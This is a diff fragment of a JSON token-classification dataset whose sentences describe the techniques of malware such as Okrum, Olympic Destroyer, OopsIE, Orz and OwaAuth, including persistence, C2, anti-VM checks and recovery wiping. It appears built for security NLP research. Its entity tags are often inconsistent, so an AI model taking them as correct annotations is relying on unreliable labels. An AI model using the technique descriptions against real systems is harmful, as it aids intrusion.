"O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "can", + "establish", + "persistence", + "by", + "creating", + "a", + ".lnk", + "shortcut", + "to", + "itself", + "in", + "the", + "Startup", + "folder." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "has", + "used", + "base64", + "to", + "encode", + "C2", + "communication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum's", + "payload", + "is", + "encrypted", + "and", + "embedded", + "within", + "its", + "loader,", + "or", + "within", + "a", + "legitimate", + "PNG", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile" + ] + }, + { + "tokens": [ + "Okrum", + "uses", + "AES", + "to", + "encrypt", + "network", + "traffic.", + "The", + "key", + "can", + "be", + "hardcoded", + "or", + "negotiated", + "with", + "the", + "C2", + "server", + "in", + "the", + "registration", + "phase." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum's", + "loader", + "can", + "check", + "the", + "amount", + "of", + "physical", + "memory", + "and", + "terminates", + "itself", + "if", + "the", + "host", + "has", + "less", + "than", + "1.5", + "Gigabytes", + "of", + "physical", + "memory", + "in", + "total." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "can", + "collect", + "computer", + "name,", + "locale", + "information,", + "and", + "information", + "about", + "the", + "OS", + "and", + "architecture." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "can", + "collect", + "network", + "information,", + "including", + "the", + "host", + "IP", + "address,", + "DNS,", + "and", + "proxy", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "was", + "seen", + "using", + "NetSess", + "to", + "discover", + "NetBIOS", + "sessions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "can", + "collect", + "the", + "victim", + "username." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "can", + "obtain", + "the", + "date", + "and", + "time", + "of", + "the", + "compromised", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum's", + "loader", + "can", + "detect", + "presence", + "of", + "an", + "emulator", + "by", + "using", + "two", + "calls", + "to", + "GetTickCount", + "API,", + "and", + "checking", + "whether", + "the", + "time", + "has", + "been", + "accelerated." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "can", + "impersonate", + "a", + "logged-on", + "user's", + "security", + "context", + "using", + "a", + "call", + "to", + "the", + "ImpersonateLoggedOnUser", + "API." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Okrum", + "loader", + "only", + "executes", + "the", + "payload", + "after", + "the", + "left", + "mouse", + "button", + "has", + "been", + "pressed", + "at", + "least", + "three", + "times,", + "in", + "order", + "to", + "avoid", + "being", + "executed", + "within", + "virtualized", + "or", + "emulated", + "environments." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "uses", + "HTTP", + "for", + "communication", + "with", + "its", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum's", + "backdoor", + "has", + "used", + "cmd.exe", + "to", + "execute", + "arbitrary", + "commands", + "as", + "well", + "as", + "batch", + "scripts", + "to", + "update", + "itself", + "to", + "a", + "newer", + "version." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "establish", + "persistence,", + "Okrum", + "can", + "install", + "itself", + "as", + "a", + "new", + "service", + "named", + "NtmSsvc." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Olympic", + "Destroyer", + "will", + "attempt", + "to", + "clear", + "the", + "System", + "and", + "Security", + "event", + "logs", + "using", + "<code>wevtutil</code>." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Olympic", + "Destroyer", + "contains", + "a", + "module", + "that", + "tries", + "to", + "obtain", + "stored", + "credentials", + "from", + "web", + "browsers." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Olympic", + "Destroyer", + "overwrites", + "files", + "locally", + "and", + "on", + "remote", + "shares." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Olympic", + "Destroyer", + "uses", + "the", + "native", + "Windows", + "utilities", + "<code>vssadmin</code>,", + "<code>wbadmin</code>,", + "and", + "<code>bcdedit</code>", + "to", + "delete", + "and", + "disable", + "operating", + "system", + "recovery", + "features", + "such", + "as", + "the", + "Windows", + "backup", + "catalog", + "and", + "Windows", + "Automatic", + "Repair." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Olympic", + "Destroyer", + "contains", + "a", + "module", + "that", + "tries", + "to", + "obtain", + "credentials", + "from", + "LSASS,", + "similar", + "to", + "Mimikatz.", + "These", + "credentials", + "are", + "used", + "with", + "PsExec", + "and", + "Windows", + "Management", + "Instrumentation", + "to", + "help", + "the", + "malware", + "propagate", + "itself", + "across", + "a", + "network." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Olympic", + "Destroyer", + "attempts", + "to", + "copy", + "itself", + "to", + "remote", + "machines", + "on", + "the", + "network." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Olympic", + "Destroyer", + "will", + "attempt", + "to", + "enumerate", + "mapped", + "network", + "shares", + "to", + "later", + "attempt", + "to", + "wipe", + "all", + "files", + "on", + "those", + "shares." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Olympic", + "Destroyer", + "uses", + "Windows", + "Management", + "Instrumentation", + "to", + "enumerate", + "all", + "systems", + "in", + "the", + "network." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Olympic", + "Destroyer", + "uses", + "PsExec", + "to", + "interact", + "with", + "the", + "<code>ADMIN$</code>", + "network", + "share", + "to", + "execute", + "commands", + "on", + "remote", + "systems." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Olympic", + "Destroyer", + "utilizes", + "PsExec", + "to", + "help", + "propagate", + "itself", + "across", + "a", + "network." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Olympic", + "Destroyer", + "uses", + "the", + "API", + "call", + "<code>ChangeServiceConfigW</code>", + "to", + "disable", + "all", + "services", + "on", + "the", + "affected", + "system." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Olympic", + "Destroyer", + "uses", + "API", + "calls", + "to", + "enumerate", + "the", + "infected", + "system's", + "ARP", + "table." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Olympic", + "Destroyer", + "will", + "shut", + "down", + "the", + "compromised", + "system", + "after", + "it", + "is", + "done", + "modifying", + "system", + "configuration", + "settings." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Features", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Olympic", + "Destroyer", + "uses", + "WMI", + "to", + "help", + "propagate", + "itself", + "across", + "a", + "network." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OnionDuke", + "can", + "use", + "a", + "custom", + "decryption", + "algorithm", + "to", + "decrypt", + "strings." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "OnionDuke", + "has", + "the", + "capability", + "to", + "use", + "a", + "Denial", + "of", + "Service", + "module." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "OnionDuke", + "steals", + "credentials", + "from", + "its", + "victims." + ], + "ner_tags": [ + "B-Way", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OnionDuke", + "uses", + "Twitter", + "as", + "a", + "backup", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OnionDuke", + "uses", + "HTTP", + "and", + "HTTPS", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "compresses", + "collected", + "files", + "with", + "a", + "simple", + "character", + "replacement", + "scheme", + "before", + "sending", + "them", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "compresses", + "collected", + "files", + "with", + "GZipStream", + "before", + "sending", + "them", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "exfiltrates", + "command", + "output", + "and", + "collected", + "files", + "to", + "its", + "C2", + "server", + "in", + "1500-byte", + "blocks." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "concatenates", + "then", + "decompresses", + "multiple", + "resources", + "to", + "load", + "an", + "embedded", + ".Net", + "Framework", + "assembly." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "can", + "upload", + "files", + "from", + "the", + "victim's", + "machine", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "has", + "the", + "capability", + "to", + "delete", + "files", + "and", + "scripts", + "from", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "can", + "download", + "files", + "from", + "its", + "C2", + "server", + "to", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "stages", + "the", + "output", + "from", + "command", + "execution", + "and", + "collected", + "files", + "in", + "specific", + "folders", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "uses", + "the", + "Confuser", + "protector", + "to", + "obfuscate", + "an", + "embedded", + ".Net", + "Framework", + "assembly", + "used", + "for", + "C2.", + "OopsIE", + "also", + "encodes", + "collected", + "data", + "in", + "hexadecimal", + "format", + "before", + "writing", + "to", + "files", + "on", + "disk", + "and", + "obfuscates", + "strings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "creates", + "a", + "scheduled", + "task", + "to", + "run", + "itself", + "every", + "three", + "minutes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "uses", + "the", + "SmartAssembly", + "obfuscator", + "to", + "pack", + "an", + "embedded", + ".Net", + "Framework", + "assembly", + "used", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "encodes", + "data", + "in", + "hexadecimal", + "format", + "over", + "the", + "C2", + "channel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "performs", + "several", + "anti-VM", + "and", + "sandbox", + "checks", + "on", + "the", + "victim's", + "machine.", + "One", + "technique", + "the", + "group", + "has", + "used", + "was", + "to", + "perform", + "a", + "WMI", + "query", + "<code>SELECT", + "*", + "FROM", + "MSAcpi_ThermalZoneTemperature</code>", + "to", + "check", + "the", + "temperature", + "to", + "see", + "if", + "it’s", + "running", + "in", + "a", + "virtual", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "checks", + "for", + "information", + "on", + "the", + "CPU", + "fan,", + "temperature,", + "mouse,", + "hard", + "disk,", + "and", + "motherboard", + "as", + "part", + "of", + "its", + "anti-VM", + "checks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "checks", + "to", + "see", + "if", + "the", + "system", + "is", + "configured", + "with", + "\"Daylight\"", + "time", + "and", + "checks", + "for", + "a", + "specific", + "region", + "to", + "be", + "set", + "for", + "the", + "timezone." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "creates", + "and", + "uses", + "a", + "VBScript", + "as", + "part", + "of", + "its", + "persistent", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "uses", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "uses", + "the", + "command", + "prompt", + "to", + "execute", + "commands", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OopsIE", + "uses", + "WMI", + "to", + "perform", + "discovery", + "techniques." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Orz", + "has", + "used", + "Technet", + "and", + "Pastebin", + "web", + "pages", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Orz", + "can", + "gather", + "victim", + "drive", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Orz", + "can", + "overwrite", + "Registry", + "settings", + "to", + "reduce", + "its", + "visibility", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Orz", + "can", + "download", + "files", + "onto", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Orz", + "can", + "perform", + "Registry", + "operations." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "Orz", + "strings", + "are", + "base64", + "encoded,", + "such", + "as", + "the", + "embedded", + "DLL", + "known", + "as", + "MockDll." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Orz", + "can", + "gather", + "a", + "process", + "list", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "Orz", + "versions", + "have", + "an", + "embedded", + "DLL", + "known", + "as", + "MockDll", + "that", + "uses", + "process", + "hollowing", + "and", + "Regsvr32", + "to", + "execute", + "another", + "payload." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "Orz", + "versions", + "have", + "an", + "embedded", + "DLL", + "known", + "as", + "MockDll", + "that", + "uses", + "Process", + "Hollowing", + "and", + "regsvr32", + "to", + "execute", + "another", + "payload." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Orz", + "can", + "gather", + "the", + "victim's", + "Internet", + "Explorer", + "version." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Orz", + "can", + "gather", + "the", + "victim", + "OS", + "version", + "and", + "whether", + "it", + "is", + "64", + "or", + "32", + "bit." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Orz", + "can", + "gather", + "victim", + "proxy", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Orz", + "can", + "execute", + "shell", + "commands.", + "Orz", + "can", + "execute", + "commands", + "with", + "JavaScript." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Out1", + "can", + "copy", + "files", + "and", + "Registry", + "data", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Out1", + "can", + "parse", + "e-mails", + "on", + "a", + "target", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Out1", + "has", + "the", + "ability", + "to", + "encode", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Out1", + "can", + "use", + "HTTP", + "and", + "HTTPS", + "in", + "communications", + "with", + "remote", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Out1", + "can", + "use", + "native", + "command", + "line", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OutSteel", + "can", + "automatically", + "scan", + "for", + "and", + "collect", + "files", + "with", + "specific", + "extensions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OutSteel", + "can", + "automatically", + "upload", + "collected", + "files", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OutSteel", + "can", + "collect", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OutSteel", + "can", + "upload", + "files", + "from", + "a", + "compromised", + "host", + "over", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OutSteel", + "can", + "delete", + "itself", + "following", + "the", + "successful", + "execution", + "of", + "a", + "follow-on", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OutSteel", + "can", + "search", + "for", + "specific", + "file", + "extensions,", + "including", + "zipped", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-Way", + "B-Features" + ] + }, + { + "tokens": [ + "OutSteel", + "can", + "download", + "files", + "from", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OutSteel", + "has", + "relied", + "on", + "a", + "user", + "to", + "execute", + "a", + "malicious", + "attachment", + "delivered", + "via", + "spearphishing." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "OutSteel", + "has", + "relied", + "on", + "a", + "user", + "to", + "click", + "a", + "malicious", + "link", + "within", + "a", + "spearphishing", + "email." + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "OutSteel", + "can", + "identify", + "running", + "processes", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OutSteel", + "has", + "been", + "distributed", + "as", + "a", + "malicious", + "attachment", + "within", + "a", + "spearphishing", + "email." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "OutSteel", + "has", + "been", + "distributed", + "through", + "malicious", + "links", + "contained", + "within", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "OutSteel", + "has", + "used", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OutSteel", + "has", + "used", + "`cmd.exe`", + "to", + "scan", + "a", + "compromised", + "host", + "for", + "specific", + "file", + "extensions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OwaAuth", + "DES-encrypts", + "captured", + "credentials", + "using", + "the", + "key", + "12345678", + "before", + "writing", + "the", + "credentials", + "to", + "a", + "log", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OwaAuth", + "has", + "a", + "command", + "to", + "list", + "its", + "directory", + "and", + "logical", + "drives." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OwaAuth", + "has", + "been", + "loaded", + "onto", + "Exchange", + "servers", + "and", + "disguised", + "as", + "an", + "ISAPI", + "filter", + "(owaauth.dll).", + "The", + "IIS", + "w3wp.exe", + "process", + "then", + "loads", + "the", + "malicious", + "DLL." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OwaAuth", + "captures", + "and", + "DES-encrypts", + "credentials", + "before", + "writing", + "the", + "username", + "and", + "password", + "to", + "a", + "log", + "file,", + "<code>C:\\log.txt</code>." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "OwaAuth", + "uses", + "the", + "filename", + "owaauth.dll,", + "which", + "is", + "a", + "legitimate", + "file", + "that", + "normally", + "resides", + "in", + "<code>%ProgramFiles%\\Microsoft\\Exchange", + "Server\\ClientAccess\\Owa\\Auth\\</code>;", + "the", + "malicious", + "file", + "by", + "the", + "same", + "name", + "is", + "saved", + "in", + "<code>%ProgramFiles%\\Microsoft\\Exchange", + "Server\\ClientAccess\\Owa\\bin\\</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + 